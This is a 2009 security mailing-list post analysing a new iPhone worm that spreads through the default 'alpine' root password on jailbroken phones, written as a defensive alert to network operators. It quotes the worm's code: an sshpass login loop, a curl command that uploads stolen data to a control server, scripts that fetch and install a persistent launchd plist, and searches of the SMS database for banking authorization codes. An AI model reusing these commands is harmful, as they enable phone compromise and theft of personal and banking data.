[nsp-sec] iPhone worm: Confirmed - possibly steals SMS messages.
Scott A. McIntyre
scott at xs4all.net
Fri Nov 20 08:56:45 EST 2009
Teams,
(Sorry for the long email, but this is all very much happening real-time here as I try to get the information out to you lot)...
As per my email the other day I'm happy (?) to report that indeed this is a new iPhone worm. It specifically targets the Mobile IP ranges of many official providers for the iPhone, and has hard coded into it the IP ranges and netmasks as so:
192.168.0.0-192.168.3.255
94.157.100.0-94.157.255.255
87.103.52.255-87.103.66.255
94.157.0.0.0-120.157.99.255
114.72.0.0-114.75.255.255
92.248.90.0-92.248.120.255
81.217.74.0-81.217.74.255
84.224.60.0-84.224.80.255
188.88.100.0-188.88.160.255
77.248.140.0-77.248.146.255
77.54.160.0-77.54.190.255
80.57.116.0-80.57.131.255
84.224.0.0-84.224.63.255
It takes advantage of the default "alpine" password with various login attempts to these ranges:
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'
It then scp overs a tarball containing sqlite, curl, the advanced commands Cydia package, and various scripts to start up the scanning/hacking.
It replaces the standard apple "ksyslog" plist with:
<string>/private/var/mobile/home/sshd</string>
It *almost* steals the SMS database:
#sqlite3 /private/var/mobile/Library/SMS/sms.db "select * from message" | cut -d \| -f 2,3,4,14 > $ID/sms.txt
On at least this phone I've been analysing this command is commented out from the setup script.
However, it does grab other data and upload it:
curl 92.61.38.16/xml/a.php?name=$ID --data "data=`base64 -w 0 ${ID}.tgz| sed -e 's/+/%plu/g'`"
I've asked Team Cymru to blackhole that IP address, I've already done so here.
AS | IP | AS Name
47205 | 92.61.38.16 | HOSTEX HOSTEX autonomous system
It also updates the com.apple.period launchd plist to harvest information and upload it to the IP listed:
#!/bin/sh
cd /private/var/mobile/home/
ID=`cat /etc/rel`
PATH=.:$PATH
function check {
if test 2 -lt $(wc -l .tmp |cut -d ' ' -f 1) ; then
cat /private/var/mobile/home/.tmp | grep -v GET | grep -v Host | grep -v User-Agent > /private/var/mobile/home/heh
sh /private/var/mobile/home/heh
fi
/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID > /private/var/mobile/home/.tmp
check;
The "duh" binary seems to be a pretty simple HTTP grabber, but, if you fuzz the ID you can get lots of fun stuff:
-----------------
if test "$(ls /System/Library/LaunchDaemons/ | grep com.apple.period.plist)" == "";then
cd /tmp
curl -O 207.58.247.187/com.apple.period.plist
mv com.apple.period.plist /System/Library/LaunchDaemons/
chmod +x /System/Library/LaunchDaemons/com.apple.period.plist
/bin/launchctl load -w /System/Library/LaunchDaemons/com.apple.period.plist
curl http://92.61.38.16/xml/p.php?ID=A
fi
#!/bin/sh
cd /private/var/mobile/Library/SMS
if test "$(grep -i tan-code sms.db |grep matches)" != "";then
sed -i -e 's/\/xml\/p.php?id=\$ID/\"\/xml\/p.php?id=\$ID\&j=1\"/g' /private/var/mobile/home/syslog
sh /private/var/mobile/home/syslog
fi
#!/bin/sh
/bin/launchctl unload -w /System/Library/LaunchDaemons/com.apple.ksyslog.plist
#!/bin/sh
cd /private/var/mobile/Library/SMS
if test "$(grep -i 'Codigo Autorizacao' sms.db |grep matches)" != "";then
sed -i -e 's/\/xml\/p.php?id=\$ID/\"\/xml\/p.php?id=\$ID\&p=2\"/g' /private/var/mobile/home/syslog
sh /private/var/mobile/home/syslog
fi
#!/bin/sh
/bin/launchctl unload -w /System/Library/LaunchDaemons/com.apple.ksyslog.plist
rm -rf /System/Library/LaunchDaemons/com.apple.ksyslog.plist
cat /bin/ls > /private/var/mobile/home/sshd
rm -rf /private/var/mobile/home/sshd
/bin/launchctl unload -w /System/Library/LaunchDaemons/com.apple.periodic.plist
-------------------
Also interesting here is what it does when it finds the Brazilian "Codigo Autorizacao" in the SMS database...
So, this is definitely new, folks, heads up to Mobile operators and Jailbreakers.
Best regards,
Scott A. McIntyre
XS4ALL Internet B.V.
More information about the nsp-security
mailing list